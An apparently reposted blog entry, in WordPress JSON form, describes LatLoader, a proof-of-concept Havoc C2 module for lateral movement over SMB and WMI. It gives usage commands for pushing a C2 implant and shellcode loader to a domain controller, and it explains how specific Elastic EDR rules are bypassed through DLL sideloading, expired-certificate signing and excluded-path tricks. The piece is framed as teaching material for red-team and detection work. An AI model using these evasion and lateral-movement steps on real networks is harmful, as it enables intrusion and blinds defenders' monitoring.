{"id":30826,"date":"2023-10-13T11:31:06","date_gmt":"2023-10-13T11:31:06","guid":{"rendered":"https:\/\/kalilinuxtutorials.com\/?p=30826"},"modified":"2023-10-13T11:31:09","modified_gmt":"2023-10-13T11:31:09","slug":"latloader","status":"publish","type":"post","link":"https:\/\/kalilinuxtutorials.com\/latloader\/","title":{"rendered":"LatLoader – Evading Elastic EDR In Lateral Movement"},"content":{"rendered":"\n

LatLoader is a PoC module to demonstrate automated lateral movement with the Havoc C2 framework. The main purpose of this project is to help others learn BOF and Havoc module development. <\/p>\n\n\n\n

This project can also help others understand basic EDR rule evasions, particularly when performing lateral movement. The sideload<\/code> subcommand is the full-featured PoC of this module. <\/p>\n\n\n\n

It will attempt to perform lateral movement via DLL sideloading while evading default Elastic EDR rules. <\/p>\n\n\n\n

For a full list of every rule evaded by this module and how it was done, please see the below section titled Elastic EDR Rule Evasions<\/a>.<\/p>\n\n\n\n

Video demo w\/ Elastic EDR<\/a><\/p>\n\n\n\n

Dependencies\/Basic Usage<\/a><\/strong><\/h2>\n\n\n\n

This module was designed to work on Linux systems with mingw-w64<\/code> installed. Additionally, you must have osslsigncode<\/a> installed to provide cert signing for the DLL utilized by the sideload<\/code> subcommand. <\/p>\n\n\n\n

Once all dependencies are installed, simply type make<\/code> and then load the module into Havoc using the script manager. To view help in Havoc, run help LatLoader<\/code>. <\/p>\n\n\n\n

To view help for subcommands, run help [subcommand]<\/code>.<\/p>\n\n\n\n

Usage\/Subcommands<\/a><\/strong><\/h2>\n\n\n\n

The LatLoader module contains 5 different subcommands. The first two, rupload<\/code> and exec<\/code>, serve as the main mechanism for executing the provided BOFs. <\/p>\n\n\n\n

The 3 other subcommands (load<\/code>, xorload<\/code>, & sideload<\/code>) combine the previous two in order to perform automated lateral movement.<\/p>\n\n\n\n

The rupload<\/code> command can be used to upload a local file to a remote system via SMB using the writefileBOF.c<\/code> BOF like so:<\/p>\n\n\n\n

LatLoader rupload dc1 \/root\/demon.x64.exe C:\\Windows\\Temp\\test.exe<\/code><\/pre>\n\n\n
\n
\"\"\/<\/figure>\n<\/div>\n\n\n
The exec<\/code> subcommand can be used to execute a command on a remote system via WMI using the wmiBOF.cpp<\/code> BOF like so:<\/p>\n\n\n\n
LatLoader exec dc1 \"cmd.exe \/c whoami > C:\\poc.txt\"<\/code><\/pre>\n\n\n
\n
\"\"\/<\/figure>\n<\/div>\n\n\n
The load<\/code> subcommand combines the two subcommands above to transfer a specified exe to the remote host via SMB and execute it over WMI:<\/p>\n\n\n\n
LatLoader load dc1 \/root\/test.exe<\/code><\/pre>\n\n\n
\n
\"\"\/<\/figure>\n<\/div>\n\n\n
The xorload<\/code> subcommand will perform lateral movement using a simple shellcode loader. This is designed to bypass basic AV detections:<\/p>\n\n\n\n
LatLoader xorload dc1 \/root\/demon.x64.bin<\/code><\/pre>\n\n\n
\n
\"\"\/<\/figure>\n<\/div>\n\n\n
Finally, the sideload<\/code> subcommand will perform lateral movement by DLL sideloading a simple shellcode loader. Actions were also taken to evade various elastic EDR rules.<\/p>\n\n\n\n
LatLoader sideload dc1 \/root\/demon.x64.bin<\/code><\/pre>\n\n\n
\n
\"\"\/<\/figure>\n<\/div>\n\n\n
Elastic EDR Rule Evasions<\/a><\/strong><\/h2>\n\n\n\n
The following is a list of various Elastic EDR rules that could alert when performing lateral movement. I have provided what steps were taken to evade each rule. <\/p>\n\n\n\n
All evasions described here were implemented in the sideload<\/code> subcommand to demonstrate how they can be combined to create a fully functional PoC.<\/p>\n\n\n\n
<\/a>Remote Execution via File Shares<\/strong><\/a><\/h2>\n\n\n\n
Description:<\/strong> Identifies the execution of a file that was created by the virtual system process. This may indicate lateral movement via network file shares.<\/p>\n\n\n\n
Bypass:<\/strong> This rule was bypassed by performing DLL sideloading.<\/p>\n\n\n\n
<\/a>Malicious Behavior Detection Alert: Unsigned File Execution via Network Logon<\/strong><\/a><\/h2>\n\n\n\n
Description:<\/strong> Identifies the execution of a recently created file that is unsigned or untrusted and from a remote network logon. This may indicate lateral movement via remote services.<\/p>\n\n\n\n
Bypass:<\/strong> This rule was bypassed by performing DLL sideloading.<\/p>\n\n\n\n
<\/a>Malicious Behavior Detection Alert: Execution of a File Dropped from SMB<\/strong><\/a><\/h2>\n\n\n\n
Description:<\/strong> Identifies the execution of a file that was created by the virtual system process and subsequently executed. This may indicate lateral movement via network file shares.<\/p>\n\n\n\n
Bypass:<\/strong> This rule was bypassed by executing the transferred file using cmd.exe \/c. This evades the rule because the file is not executed directly, but instead by a trusted binary.<\/p>\n\n\n\n
<\/a>WMI Incoming Lateral Movement<\/strong><\/a><\/h2>\n\n\n\n
Description:<\/strong> Identifies processes executed via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement, but could be noisy if administrators use WMI to remotely manage hosts.<\/p>\n\n\n\n
Bypass:<\/strong> This rule was bypassed by including a path in our command that the rule excludes. As seen in the query, C:\\\\Windows\\\\CCMCache\\\\*<\/code> is one of these directories, which was appended to each wmi command like so: && echo --path C:\\\\Windows\\\\CCMCache\\\\cache<\/code><\/p>\n\n\n\n
<\/a>Malicious Behavior Prevention Alert: DLL Side Loading via a Copied Microsoft Executable<\/strong><\/a><\/h2>\n\n\n\n
Description:<\/strong> Identifies when a Microsoft signed binary is copied to a directory and shortly followed by the loading of an unsigned DLL from the same directory. <\/p>\n\n\n\n
Adversaries may opt for moving Microsoft signed binaries to a random directory and use them as a host for malicious DLL sideloading during the installation phase.<\/p>\n\n\n\n
Bypass:<\/strong> This rule was bypassed by signing the DLL sideloader with an expired cert. The expired cert was obtained from here<\/a><\/p>\n\n\n\n
<\/a>Malicious Behavior Prevention Alert: VirtualProtect API Call from an Unsigned DLL<\/strong><\/a><\/h2>\n\n\n\n
Description:<\/strong> Identifies the load of an unsigned or untrusted DLL by a trusted binary followed by calling VirtualProtect API to change memory permission to execute or write. This may indicate execution via DLL sideloading to perform code injection.<\/p>\n\n\n\n
Bypass:<\/strong> This rule was bypassed by signing the DLL sideloader with an expired cert. The expired cert was obtained from here<\/a><\/p>\n\n\n\n
<\/a>Potential Lateral Tool Transfer via SMB Share<\/strong><\/a><\/h2>\n\n\n\n
Description:<\/strong> Identifies the creation or change of a Windows executable file over network shares. Adversaries may transfer tools or other files between systems in a compromised environment.<\/p>\n\n\n\n
Bypass:<\/strong> This rule was bypassed by creating the file via SMB with a safe extension like .png, and then making a copy of the file with it’s real extension via WMI.<\/p>\n\n\n\n
<\/a>Malicious Behavior Detection Alert: ImageLoad of a File dropped via SMB<\/strong><\/a><\/h2>\n\n\n\n
Description:<\/strong> Identifies the transfer of a library via SMB followed by loading it into commonly DLL proxy execution binaries such as rundll32, regsvr32 and shared services via svchost.exe. This may indicate an attempt to remotely execute malicious code.<\/p>\n\n\n\n
Bypass:<\/strong> This rule was bypassed by creating the file via SMB with a safe extension like .png, and then making a copy of the file with it’s real extension via WMI.<\/p>\n\n\n\n
Standalone Binaries<\/a><\/strong><\/h2>\n\n\n\n
I have also provided standalone versions of the BOFs used in this project. These could be useful if you are unfamiliar with BOF development and would like to learn by comparing a normal program to it’s BOF counterpart.<\/p>\n\n\n\n
wmiexec.cpp<\/code> is the standalone binary for command execution via WMI. It can be compiled with mingw like so:<\/p>\n\n\n\n
x86_64-w64-mingw32-g++ wmiexec.cpp -I include -l oleaut32 -l ole32 -l wbemuuid -w -static -o \/share\/wmiexec.exe<\/code><\/pre>\n\n\n\n
The exe can then be transferred to the target and executed like so, providing arguments via the cli:<\/p>\n\n\n\n
.\\wmiexec.exe dc1 'cmd.exe \/c whoami > c:\\test.txt'<\/code><\/pre>\n\n\n\n
writefile.c<\/code> is the standalone binary for file transfer via SMB. It can be compiled with mingw like so:<\/p>\n\n\n\n
x86_64-w64-mingw32-gcc writefile.c -w -static -o \/share\/writefile.exe<\/code><\/pre>\n\n\n\n
The exe can then be transferred to the target and executed like so, providing arguments via the cli:<\/p>\n\n\n\n
.\\writefile.exe .\\test.txt \\\\dc1\\C$\\poc.txt<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
LatLoader is a PoC module to demonstrate automated lateral movement with the Havoc C2 framework. The main purpose of this project is to help others learn BOF and Havoc module development. This project can also help others understand basic EDR rule evasions, particularly when performing lateral movement. The sideload subcommand is the full-featured PoC of this module. […]<\/p>\n","protected":false},"author":12,"featured_media":30844,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhmfAlWQ_O-lIPkLb335gVQYf8yrNUVmuNxcvJUl0XeIbUMDRcZGdgPUBD3INJEvIgDAFnt60oyoPxC8VZfakk2Phs0VIJwawHwQuCDSKQPIlneZyOTkEfjq4_z6qYMxmS4BQcF8pc-WWfOWGYqXO5BTkAVkRptZVeTM-HqLInLRwGZjWaEtg4hhnZpiw\/s16000\/LatLoader.webp","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[20],"tags":[737,6321,6052,6325,6356],"class_list":["post-30826","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cyber-security","tag-cybersecurity","tag-informationsecurity","tag-kalilinux","tag-kalilinuxtools","tag-latloader"],"yoast_head":"\nLatLoader - Evading Elastic EDR In Lateral Movement<\/title>\n<meta name=\"description\" content=\"LatLoader is a PoC module to demonstrate automated lateral movement with the Havoc C2 framework. The main purpose of this project\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/kalilinuxtutorials.com\/latloader\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"LatLoader - Evading Elastic EDR In Lateral Movement\" \/>\n<meta property=\"og:description\" content=\"LatLoader is a PoC module to demonstrate automated lateral movement with the Havoc C2 framework. The main purpose of this project\" \/>\n<meta property=\"og:url\" content=\"https:\/\/kalilinuxtutorials.com\/latloader\/\" \/>\n<meta property=\"og:site_name\" content=\"Kali Linux Tutorials\" \/>\n<meta property=\"article:published_time\" content=\"2023-10-13T11:31:06+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2023-10-13T11:31:09+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhmfAlWQ_O-lIPkLb335gVQYf8yrNUVmuNxcvJUl0XeIbUMDRcZGdgPUBD3INJEvIgDAFnt60oyoPxC8VZfakk2Phs0VIJwawHwQuCDSKQPIlneZyOTkEfjq4_z6qYMxmS4BQcF8pc-WWfOWGYqXO5BTkAVkRptZVeTM-HqLInLRwGZjWaEtg4hhnZpiw\/s16000\/LatLoader.webp\" \/>\n<meta name=\"author\" content=\"Varshini\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhmfAlWQ_O-lIPkLb335gVQYf8yrNUVmuNxcvJUl0XeIbUMDRcZGdgPUBD3INJEvIgDAFnt60oyoPxC8VZfakk2Phs0VIJwawHwQuCDSKQPIlneZyOTkEfjq4_z6qYMxmS4BQcF8pc-WWfOWGYqXO5BTkAVkRptZVeTM-HqLInLRwGZjWaEtg4hhnZpiw\/s16000\/LatLoader.webp\" \/>\n<meta name=\"twitter:creator\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:site\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Varshini\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/latloader\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/latloader\/\"},\"author\":{\"name\":\"Varshini\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/3c3b3f82a74146532c4def299fe069fa\"},\"headline\":\"LatLoader – Evading Elastic EDR In Lateral Movement\",\"datePublished\":\"2023-10-13T11:31:06+00:00\",\"dateModified\":\"2023-10-13T11:31:09+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/latloader\/\"},\"wordCount\":1065,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/latloader\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhmfAlWQ_O-lIPkLb335gVQYf8yrNUVmuNxcvJUl0XeIbUMDRcZGdgPUBD3INJEvIgDAFnt60oyoPxC8VZfakk2Phs0VIJwawHwQuCDSKQPIlneZyOTkEfjq4_z6qYMxmS4BQcF8pc-WWfOWGYqXO5BTkAVkRptZVeTM-HqLInLRwGZjWaEtg4hhnZpiw\/s16000\/LatLoader.webp\",\"keywords\":[\"cybersecurity\",\"informationsecurity\",\"kalilinux\",\"kalilinuxtools\",\"LatLoader\"],\"articleSection\":[\"Cyber security\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/kalilinuxtutorials.com\/latloader\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/latloader\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/latloader\/\",\"name\":\"LatLoader - Evading Elastic EDR In Lateral Movement\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/latloader\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/latloader\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhmfAlWQ_O-lIPkLb335gVQYf8yrNUVmuNxcvJUl0XeIbUMDRcZGdgPUBD3INJEvIgDAFnt60oyoPxC8VZfakk2Phs0VIJwawHwQuCDSKQPIlneZyOTkEfjq4_z6qYMxmS4BQcF8pc-WWfOWGYqXO5BTkAVkRptZVeTM-HqLInLRwGZjWaEtg4hhnZpiw\/s16000\/LatLoader.webp\",\"datePublished\":\"2023-10-13T11:31:06+00:00\",\"dateModified\":\"2023-10-13T11:31:09+00:00\",\"description\":\"LatLoader is a PoC module to demonstrate automated lateral movement with the Havoc C2 framework. The main purpose of this project\",\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/kalilinuxtutorials.com\/latloader\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/latloader\/#primaryimage\",\"url\":\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhmfAlWQ_O-lIPkLb335gVQYf8yrNUVmuNxcvJUl0XeIbUMDRcZGdgPUBD3INJEvIgDAFnt60oyoPxC8VZfakk2Phs0VIJwawHwQuCDSKQPIlneZyOTkEfjq4_z6qYMxmS4BQcF8pc-WWfOWGYqXO5BTkAVkRptZVeTM-HqLInLRwGZjWaEtg4hhnZpiw\/s16000\/LatLoader.webp\",\"contentUrl\":\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhmfAlWQ_O-lIPkLb335gVQYf8yrNUVmuNxcvJUl0XeIbUMDRcZGdgPUBD3INJEvIgDAFnt60oyoPxC8VZfakk2Phs0VIJwawHwQuCDSKQPIlneZyOTkEfjq4_z6qYMxmS4BQcF8pc-WWfOWGYqXO5BTkAVkRptZVeTM-HqLInLRwGZjWaEtg4hhnZpiw\/s16000\/LatLoader.webp\",\"width\":\"1600\",\"height\":\"900\"},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"name\":\"Kali Linux Tutorials\",\"description\":\"Kali Linux Tutorials\",\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\",\"name\":\"Kali Linux Tutorials\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"contentUrl\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"width\":272,\"height\":90,\"caption\":\"Kali Linux Tutorials\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/x.com\/CyberEdition\",\"https:\/\/www.threads.com\/@cybersecurityedition\",\"https:\/\/www.linkedin.com\/company\/cyberedition\",\"https:\/\/www.instagram.com\/cybersecurityedition\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/3c3b3f82a74146532c4def299fe069fa\",\"name\":\"Varshini\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/f19f43637c0f83fb3dcfb498f306b2a9ac0025ce85840ab52ee8c01f5361f269?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/f19f43637c0f83fb3dcfb498f306b2a9ac0025ce85840ab52ee8c01f5361f269?s=96&d=mm&r=g\",\"caption\":\"Varshini\"},\"description\":\"Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging Threats and Technologies.\",\"sameAs\":[\"http:\/\/kalilinuxtutorials.com\",\"https:\/\/www.linkedin.com\/in\/senthamil-selvan-14043a285\/\"],\"url\":\"https:\/\/kalilinuxtutorials.com\/author\/vinayakagrawal\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"LatLoader - Evading Elastic EDR In Lateral Movement","description":"LatLoader is a PoC module to demonstrate automated lateral movement with the Havoc C2 framework. The main purpose of this project","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/kalilinuxtutorials.com\/latloader\/","og_locale":"en_US","og_type":"article","og_title":"LatLoader - Evading Elastic EDR In Lateral Movement","og_description":"LatLoader is a PoC module to demonstrate automated lateral movement with the Havoc C2 framework. The main purpose of this project","og_url":"https:\/\/kalilinuxtutorials.com\/latloader\/","og_site_name":"Kali Linux Tutorials","article_published_time":"2023-10-13T11:31:06+00:00","article_modified_time":"2023-10-13T11:31:09+00:00","og_image":[{"url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhmfAlWQ_O-lIPkLb335gVQYf8yrNUVmuNxcvJUl0XeIbUMDRcZGdgPUBD3INJEvIgDAFnt60oyoPxC8VZfakk2Phs0VIJwawHwQuCDSKQPIlneZyOTkEfjq4_z6qYMxmS4BQcF8pc-WWfOWGYqXO5BTkAVkRptZVeTM-HqLInLRwGZjWaEtg4hhnZpiw\/s16000\/LatLoader.webp","type":"","width":"","height":""}],"author":"Varshini","twitter_card":"summary_large_image","twitter_image":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhmfAlWQ_O-lIPkLb335gVQYf8yrNUVmuNxcvJUl0XeIbUMDRcZGdgPUBD3INJEvIgDAFnt60oyoPxC8VZfakk2Phs0VIJwawHwQuCDSKQPIlneZyOTkEfjq4_z6qYMxmS4BQcF8pc-WWfOWGYqXO5BTkAVkRptZVeTM-HqLInLRwGZjWaEtg4hhnZpiw\/s16000\/LatLoader.webp","twitter_creator":"@CyberEdition","twitter_site":"@CyberEdition","twitter_misc":{"Written by":"Varshini","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/kalilinuxtutorials.com\/latloader\/#article","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/latloader\/"},"author":{"name":"Varshini","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/3c3b3f82a74146532c4def299fe069fa"},"headline":"LatLoader – Evading Elastic EDR In Lateral Movement","datePublished":"2023-10-13T11:31:06+00:00","dateModified":"2023-10-13T11:31:09+00:00","mainEntityOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/latloader\/"},"wordCount":1065,"commentCount":0,"publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/latloader\/#primaryimage"},"thumbnailUrl":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhmfAlWQ_O-lIPkLb335gVQYf8yrNUVmuNxcvJUl0XeIbUMDRcZGdgPUBD3INJEvIgDAFnt60oyoPxC8VZfakk2Phs0VIJwawHwQuCDSKQPIlneZyOTkEfjq4_z6qYMxmS4BQcF8pc-WWfOWGYqXO5BTkAVkRptZVeTM-HqLInLRwGZjWaEtg4hhnZpiw\/s16000\/LatLoader.webp","keywords":["cybersecurity","informationsecurity","kalilinux","kalilinuxtools","LatLoader"],"articleSection":["Cyber security"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/kalilinuxtutorials.com\/latloader\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/kalilinuxtutorials.com\/latloader\/","url":"https:\/\/kalilinuxtutorials.com\/latloader\/","name":"LatLoader - Evading Elastic EDR In Lateral Movement","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/latloader\/#primaryimage"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/latloader\/#primaryimage"},"thumbnailUrl":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhmfAlWQ_O-lIPkLb335gVQYf8yrNUVmuNxcvJUl0XeIbUMDRcZGdgPUBD3INJEvIgDAFnt60oyoPxC8VZfakk2Phs0VIJwawHwQuCDSKQPIlneZyOTkEfjq4_z6qYMxmS4BQcF8pc-WWfOWGYqXO5BTkAVkRptZVeTM-HqLInLRwGZjWaEtg4hhnZpiw\/s16000\/LatLoader.webp","datePublished":"2023-10-13T11:31:06+00:00","dateModified":"2023-10-13T11:31:09+00:00","description":"LatLoader is a PoC module to demonstrate automated lateral movement with the Havoc C2 framework. The main purpose of this project","inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/kalilinuxtutorials.com\/latloader\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/latloader\/#primaryimage","url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhmfAlWQ_O-lIPkLb335gVQYf8yrNUVmuNxcvJUl0XeIbUMDRcZGdgPUBD3INJEvIgDAFnt60oyoPxC8VZfakk2Phs0VIJwawHwQuCDSKQPIlneZyOTkEfjq4_z6qYMxmS4BQcF8pc-WWfOWGYqXO5BTkAVkRptZVeTM-HqLInLRwGZjWaEtg4hhnZpiw\/s16000\/LatLoader.webp","contentUrl":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhmfAlWQ_O-lIPkLb335gVQYf8yrNUVmuNxcvJUl0XeIbUMDRcZGdgPUBD3INJEvIgDAFnt60oyoPxC8VZfakk2Phs0VIJwawHwQuCDSKQPIlneZyOTkEfjq4_z6qYMxmS4BQcF8pc-WWfOWGYqXO5BTkAVkRptZVeTM-HqLInLRwGZjWaEtg4hhnZpiw\/s16000\/LatLoader.webp","width":"1600","height":"900"},{"@type":"WebSite","@id":"https:\/\/kalilinuxtutorials.com\/#website","url":"https:\/\/kalilinuxtutorials.com\/","name":"Kali Linux Tutorials","description":"Kali Linux Tutorials","publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/kalilinuxtutorials.com\/#organization","name":"Kali Linux Tutorials","url":"https:\/\/kalilinuxtutorials.com\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/","url":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","contentUrl":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","width":272,"height":90,"caption":"Kali Linux Tutorials"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/CyberEdition","https:\/\/www.threads.com\/@cybersecurityedition","https:\/\/www.linkedin.com\/company\/cyberedition","https:\/\/www.instagram.com\/cybersecurityedition\/"]},{"@type":"Person","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/3c3b3f82a74146532c4def299fe069fa","name":"Varshini","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/f19f43637c0f83fb3dcfb498f306b2a9ac0025ce85840ab52ee8c01f5361f269?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f19f43637c0f83fb3dcfb498f306b2a9ac0025ce85840ab52ee8c01f5361f269?s=96&d=mm&r=g","caption":"Varshini"},"description":"Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging Threats and Technologies.","sameAs":["http:\/\/kalilinuxtutorials.com","https:\/\/www.linkedin.com\/in\/senthamil-selvan-14043a285\/"],"url":"https:\/\/kalilinuxtutorials.com\/author\/vinayakagrawal\/"}]}},"jetpack_featured_media_url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhmfAlWQ_O-lIPkLb335gVQYf8yrNUVmuNxcvJUl0XeIbUMDRcZGdgPUBD3INJEvIgDAFnt60oyoPxC8VZfakk2Phs0VIJwawHwQuCDSKQPIlneZyOTkEfjq4_z6qYMxmS4BQcF8pc-WWfOWGYqXO5BTkAVkRptZVeTM-HqLInLRwGZjWaEtg4hhnZpiw\/s16000\/LatLoader.webp","jetpack_sharing_enabled":true,"jetpack-related-posts":[{"id":35596,"url":"https:\/\/kalilinuxtutorials.com\/awesome-edr-bypass\/","url_meta":{"origin":30826,"position":0},"title":"Awesome EDR Bypass : A Comprehensive Guide For Ethical Hackers","author":"Varshini","date":"January 2, 2025","format":false,"excerpt":"EDR bypass technology is not just for attackers. Many malware now have EDR bypass capabilities, knowledge that pentesters and incident responders should also be aware of. This repository is not intended to be used to escalate attacks. Use it for ethical hacking. PoC trickster0\/TartarusGate: TartarusGate, Bypassing EDRs am0nsec\/HellsGate: Original C\u2026","rel":"","context":"In "Cyber security"","block_context":{"text":"Cyber security","link":"https:\/\/kalilinuxtutorials.com\/category\/cyber-security\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhVTVrDfdHPNRElUbpPw_tvW5AwqBKo6aT_BPiSDbVANiKT5zDLza02RARdWbz92DVkEtwdIl6-LF_SiNDEBnlz8IUuOBkKt-NiPyMQkMMLL-cnxRVCPwjctjANd0kjESyNRQtjWobW4vlStkW-9EPJTIEFrsq4b3s4z0LmpsEpVaXZ4A1hl4PPPHZjB_1A\/s1600\/Awesome%20EDR%20Bypass.webp?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhVTVrDfdHPNRElUbpPw_tvW5AwqBKo6aT_BPiSDbVANiKT5zDLza02RARdWbz92DVkEtwdIl6-LF_SiNDEBnlz8IUuOBkKt-NiPyMQkMMLL-cnxRVCPwjctjANd0kjESyNRQtjWobW4vlStkW-9EPJTIEFrsq4b3s4z0LmpsEpVaXZ4A1hl4PPPHZjB_1A\/s1600\/Awesome%20EDR%20Bypass.webp?resize=350%2C200&ssl=1 1x, 